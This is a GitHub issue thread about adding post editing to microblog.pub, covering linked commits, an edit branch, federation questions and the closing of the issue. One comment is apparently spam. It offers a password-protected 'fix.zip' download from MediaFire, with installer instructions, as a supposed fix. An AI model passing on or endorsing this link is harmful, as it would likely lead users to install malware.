### ISSUE TITLE
Add edit function to posts

### ISSUE THREAD

**Issue by nigini** [tinyBlogPub/microblog.pub#11]
I have seen community members (in the old repo) raise this issue before (need references). But in a recent conversation with @chri2 that was raised as a significant enhancement to User Experience. Considering I agree, let us add this to the backlog.

The primary step will likely be to study how to signal edition in the ActivityProtocol. After that, editing things locally should not be complicated.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 778a0a** [comment]
Hello,

The original microblog.pub server already has an editing feature (implemented in boxes.py/send_update).

All that remains is to create the template and the frontend API.

I've already implemented this myself, although it's a rough implementation. I hope it can be helpful.

- https://github.com/778a0a/microblog/commit/29fecb407211a1b773ba47466ec1b736e43f4884
- https://github.com/778a0a/microblog/commit/3df5a2c32939ceaa8d9fde213b6956f976279d6e
- https://github.com/778a0a/microblog/commit/5633c48a9f162dfa7539653aa45d0abce4618875

Good Luck!

**Comment by nigini** [comment]
Will totally check your implementation. Thanks for sharing!

**Comment by nigini** [comment]
Created branch [edit_post](https://github.com/microblog-pub/microblog.pub/tree/edit_post) with @778a0a commits. We still need to test changes, considering there was a lot of merging with newer code!

**Comment by nigini** [comment]
OK! After updating @778a0a code to the newer template structure, we have a first version of the edit functionality. 🥳

![Screenshot from 2024-09-05 21-17-48](https://github.com/user-attachments/assets/0ee25056-abdb-489d-b4f4-c5719132fe24)

![Screenshot from 2024-09-05 21-17-27](https://github.com/user-attachments/assets/10215a93-a8eb-4cfd-bd89-a76b678408bd)

One thing that I observed, though, is that the metadata of the post (like the date) does not change to indicate the edit happened. I will do some more testing to check if the changes are following the ActivityPub requirements and maybe add some info about the edition to our UI before merging to main!

**Comment by 3b0b** [comment]
For what it's worth, unless there were a _separate_ "edited on," this is what I'd expect - that the edit would retain the original date, and also that whether it bubbles to the top of any other view of my profile on other instances would be left up to that implementation, or possibly to the viewing user's settings. For my own purposes, I'm fine with needing to add notes _within the edited post_ to indicate what was edited and when. Not saying that's what everything should want - just how I feel about it.

Also...I updated to the current code the other day and tried an edit, and while I haven't tried either digging through my logs or checking from other instances to figure out what exactly happened, it doesn't _look_ like my edit federated to my other account's instance. I'll try to keep closer tabs on what's happening if I do it again so I can determine whether the problem might be ours, mine, or the other instance's.

It might even be article-specific. It's hard for me to be sure, especially since I don't know from the instances I'm able to check whether the divide between instances that show the full article in-line versus ones that show a title and excerpt and link to my blog is due to the other instance where I have an account _not being Mastodon_ while all the others I checked are, or due to its being the only one where I'm logged in, or neither.

**Comment by nigini** [comment]
Thanks for going ahead and putting it through fire @3b0b!
I'm really glad to see that we are already pushing things forward. I agree that the current implementation looks fine. Maybe we can agree that the federation of the edits is a separate issue.

**Comment by nigini** [comment]
Ok, all. I also deployed the `edit_post` branch on my personal instance, and everything seems to work okay.
I will close this issue, and if we find out that the current edit function does not federate the change, we can open another issue for that.
